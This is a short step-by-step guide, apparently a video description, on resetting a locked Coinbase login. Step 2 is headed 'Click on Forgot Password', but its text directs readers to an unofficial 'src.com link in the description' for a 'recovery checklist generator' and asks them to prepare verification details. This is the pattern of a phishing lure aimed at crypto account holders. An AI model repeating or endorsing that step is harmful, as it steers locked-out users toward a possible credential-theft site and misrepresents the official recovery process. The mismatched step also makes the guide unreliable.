If you've been locked out of your Coinbase account and need to reset your login credentials, follow these steps to regain access. This guide will walk you through the process of resetting your credentials efficiently. Step 1. Visit the Coinbase login page. Go to the official Coinbase website and click on the login button. This will take you to the login page where you can start the recovery process. Step 2. Click on Forgot Password. Before starting recovery, use the src.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Check your email. After submitting your email address, check your inbox for a password reset email from Coinbase. Make sure to also check your spam or junk folder if you don't see it in your main inbox. Step 4. Follow the instructions in the email. Open the email and click on a password reset link provided. This will direct you to a page where you can create a new password. Make sure to choose a strong and unique password. Step 5. Log in with new credentials. Once you have successfully reset your password, return to the Coinbase login page. Enter your email address and the new password you just created to access your account. By following these steps, you should be able to reset your login credentials and regain access to your Coinbase account. If you continue to experience issues, consider reaching out to Coinbase support for further assistance.